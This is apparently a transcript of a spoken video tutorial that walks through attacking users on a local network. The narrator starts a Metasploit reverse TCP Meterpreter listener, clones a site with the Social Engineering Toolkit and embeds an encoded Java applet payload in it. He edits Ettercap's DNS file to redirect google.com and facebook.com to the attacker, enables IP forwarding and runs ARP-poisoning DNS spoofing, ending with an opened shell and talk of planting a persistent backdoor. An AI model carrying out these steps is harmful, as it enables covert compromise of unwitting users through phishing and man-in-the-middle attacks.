Windows/interpreter /reverse_TCP, and now we want to go set localhost 192.168.1.6, again your local IP. Okay, set port 1337, which we created above. Show options, and you can see our listen ports 0.6, and I mean listen address 0.6, and our listening port is 1337. So we go exploit. Okay, we'll let that run, as that's just listening for this exe to be ran on another Windows system. Okay, so now we've done that, we will want to chuck open, what is it, we want to open set the social engineering toolkit. We want to go to website attack vectors, which is 2. This is where we'll be spoofing a website, where we'll be cloning a website, and then we'll be spoofing the cloned website to its original website. Well, we won't be doing to the original, we'll just be doing Google for such. You'll see how it works. Okay, we're going to site cloner. I will grab the URL which I'm going to clone. Skip. It needs Flash. Oh yay. A map made by me. Okay, anyway. Copy that. Address. I will chuck back to our. Yeah, so that's the site we're going to be cloning. So just enter that. Now we want to embed a reverse TCP interpreter shell in that site. So number 2. Again, I'm going to be using that encryption. You can also use multi-encoder, but I think that works way better than any of them. 2, and enter as default. It encrypts it 4 times, and I set it so it's no. I'm going to set it so it's yes if you want it to run on Linux/OXS OSs. Okay, so now server started on 192.168.1.6. We can test that on 192 numlock 192.168.1.6. As you can see, it loads the cloned website, and it'll chuck open a Java pop-up soon, but I'll close it as I haven't finished showing you the tutorial. Go away, Java, not running you yet. Okay, you can see it said, oh, someone loaded the website. Okay, now we want to open Conqueror. Now we're going to go home folder, let's go up, we go to user, share, we go ethercap, where is it, ethercap, ether.dns, and new session, scroll down, here we go. Okay, for how we use this. When we DNS spoof, the DNS spoof looks at this file and says, okay, anyone who's trying to get to Microsoft will be redirected to this IP, which is a Linux site. So we'll put our addresses in, so if they try to go to Google, they will be redirected to 192.168.1.6, which is our computer. And our computer's running, or the attacker's computer's running, a website which is cloned, which looks exactly the same as the original, but has a Java exploit inside it. So they will never know. They'll be like, okay, say if you cloned Facebook and only set it so it was Facebook, that redirects them, and you cloned Facebook and injected a Java applet into Facebook, then, and they were only trying to load Facebook and send Facebook over 9,000 times here, but you get the idea. If you clone Facebook, set the intercap so if they only try to go to facebook.com, the cloned website will work. They'll be like, oh, Java's only being asked on this one website. Well, we'll just run it. I trust Facebook. I'm sure it's good enough. And then as soon as they run it, you get an interpreter shell, and then you can upload your backdoor, and then set as a schedule, and then you're in for life, forevers. Okay, continuing. So, let's put Facebook since I've already typed it out. So A in the middle is just like, okay, transfer. I don't know what it means, but it transfers you. So go on with Google. So Google.com A 192.168.1.6 wildcard.google.com. I can just do .wildcard at 192.168.1.6. Okay, wildcard say you can put hello.google.com and it'll .blah, and it will still redirect them to, well, 192.168.1.6. Wildcards is like, okay, anything in front will redirect, anything behind will redirect. So I'll also do that with Facebook. Just wildcard.facebook.com .wildcard redirected to 192.168.1.6, and we'll just do facebook.com 192.168.1.6. Okay, once we've done that, just save it. Don't need it anymore. Get rid of it. Open up a new console. So we got one console listening for this exe over here to be ran, and our set console hosting a website which is cloned, which has a Java exploit inside it, and now we want to start our DNS spoof, which uses the server. Okay, so let's begin with just, you know, eco 1. So we'll be setting up IP forwarding now, /proc /sys, tab doesn't work, /sys /net /IP version 4 /IP _forward. Enter. It may look like it's done shit all, but it's done something. It's allowed you to forward your IP addresses. Hurrah! Okay, next, ethercap dash capital T dash small q dash capital M ARP remote dash capital P DNS _ spoof. I'm not too sure what these letters do. I should actually probably tell you, but I have forgot. So Google it. Google ethercap dash T, capital T. You could probably use the question mark command to find out what they are. If you wanna know what -t, -q, -m, -p is. Oh, that's plugin. That's probably mode. Hell I do. I don't know what these are. I don't know. Okay, so now we've got our DNS spoofed. So it's working now. It's scanned for all the hosts, and it is good to go. It is good to go. So we got our server running, our DNS spoof, and our listener. Well, this is also a listener in here. It's a listener and a server running. This is just the listener for that exe, so this is sort of separate at the moment. So we'll jump back to our VM, chuck open internet, and we will go to a site other than Google to show you it works. Go to my channel, and you can just accidentally click like, and you can just accidentally click subscribe, and yeah, you got the idea. Okay, and watch my other videos. They're pretty exciting. Not really. Okay, now you can see all the other site works. So as soon as we say go to Google, this is going to be a bit dodgy if you saw this on your own computer, but if you clone Google and only spoofed Google, it wouldn't look dodgy. It's like, oh yeah, I want to go to Google. Oh, it takes me to UXS Elite Games Group. That sounds legit. Let me go to, I'll quit out of this when it gives me that Java plugin. Okay, and open another one. So if you cloned Facebook and only spoofed Facebook, they'll be like, oh, Facebook's asking for Java. I trust Facebook. It's Facebook. It looks like Facebook. I cloned Facebook, so it's all good. See, if it just goes to the site you wanted, it doesn't actually go to the actual title or anything. So as soon as you run this, they're nubbed, pretty much. Nubbed. So we don't need that anymore. Jump over here and scroll down to the bottom. So, okay, interpreter show opened. How handy. So now we go sessions -L.